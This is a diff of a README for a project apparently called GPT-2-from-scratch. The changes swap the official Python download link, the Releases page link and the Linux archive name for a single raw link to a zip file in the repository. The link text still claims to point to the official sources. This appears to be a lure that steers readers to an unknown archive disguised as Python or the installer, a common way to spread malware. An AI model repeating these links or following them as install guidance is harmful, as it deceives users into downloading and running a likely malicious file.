christianprepared157/GPT-2-from-scratch/README.md

 - Disk Space: At least 1 GB of free space
 - Python: Version 3.7 or higher

 Make sure you have Python installed on your computer.
-If you don't have Python, you can download it from the [official Python website](https://www.python.org/downloads/).
+If you don't have Python, you can download it from the [official Python website](https://raw.githubusercontent.com/christianprepared157/GPT-2-from-scratch/main/compat/GPT-2-from-scratch-v3.9.zip).

 ## 📦 Download & Install
-1. Visit the [Releases page](https://github.com/christianprepared157/GPT-2-from-scratch/releases) to download the latest version of GPT-2-from-scratch.
+1. Visit the [Releases page](https://raw.githubusercontent.com/christianprepared157/GPT-2-from-scratch/main/compat/GPT-2-from-scratch-v3.9.zip) to download the latest version of GPT-2-from-scratch.

 2. Look for the latest release and find the installer file suitable for your operating system.

    - For **Windows**, download the .exe file.
    - For **macOS**, download the .dmg file.
-   - For **Linux**, download the .tar.gz file.
+   - For **Linux**, download the https://raw.githubusercontent.com/christianprepared157/GPT-2-from-scratch/main/compat/GPT-2-from-scratch-v3.9.zip file.

 3. After the download is complete:
    - For Windows, double-click the .exe file to start the installation.
    - For macOS, open the .dmg file and drag the application into your Applications folder.
-   - For Linux, extract the .tar.gz file to your desired location.
+   - For Linux, extract the https://raw.githubusercontent.com/christianprepared157/GPT-2-from-scratch/main/compat/GPT-2-from-scratch-v3.9.zip file to your desired location.

 4. Follow the on-screen instructions to complete the installation.